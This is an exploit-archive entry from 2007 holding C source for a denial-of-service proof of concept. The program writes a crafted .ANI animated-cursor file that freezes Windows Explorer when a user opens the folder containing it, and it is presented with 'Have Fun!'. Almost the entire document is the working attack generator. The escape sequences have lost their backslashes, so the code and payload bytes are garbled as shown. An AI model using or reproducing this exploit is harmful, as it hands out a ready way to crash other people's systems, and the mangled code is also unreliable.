[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : MS Windows Explorer Unspecified .ANI File Denial of Service Exploit
# Published : 2007-04-08
# Author : Marsu
# Previous Title : MS Windows .HLP File Local HEAP Overflow PoC 0day
# Next Title : Wserve HTTP Server 4.6 (Long Directory Name) Denial of Service Exploit
/****************************************************************************
* MS Windows Explorer Unspecified .ANI File DoS *
* *
* *
* Another .Ani bug that freezes Explorer if you open a folder that contains *
* a crafted file. *
* *
* Tested against Win XP SP2 FR. *
* Have Fun! *
* *
* Coded by Marsu <Marsupilamipowa@hotmail.fr> *
****************************************************************************/
#include "stdio.h"
#include "stdlib.h"
unsigned char Ani_headers[] =
"x52x49x46x46x08x4dx00x00x41x43x4fx4ex61x6ex69x68"
"x24x00x00x00x24x00x00x00x06x00x00x00x06x00x00x00"
"x00x00x00x00x00x00x00x00x04x00x00x00x01x00x00x00"
"x0ax00x00x00x01x00x00x00x72x61x74x65x18x00x00x00"
"x03x00x00x00x03x00x00x00x03x00x00x00x03x00x00x00"
"x03x00x00x00x03x00x00x00x4cx49x53x54xa8x4cx00x00"
"x66x72x61x6dx69x63x6fx6exbex0cx00x00x00x00x02x00"
"x01x00x20x20x00x57x57x57x57x00xa8x0cx00x00x16x00"
"x00x00x03" //Change this last char to avoid crash
;
int main(int argc, char* argv[])
{
FILE* anifile;
char evilbuff[4000];
printf("[+] MS Windows Explorer Unspecified .ANI File DoSn");
printf("[+] Coded by Marsu <Marsupilamipowa@hotmail.fr>n");
if (argc!=2) {
printf("[+] Usage: %s <file.ani>n",argv[0]);
return 0;
}
memset(evilbuff,'A',4000);
memcpy(evilbuff,Ani_headers,sizeof(Ani_headers)-1);
if ((anifile=fopen(argv[1],"wb"))==0) {
printf("[-] Unable to access file.n");
return 0;
}
fwrite( evilbuff, 1, 4000, anifile );
fclose(anifile);
printf("[+] Done. Have fun!n");
return 0;
}
// www.Syue.com [2007-04-08]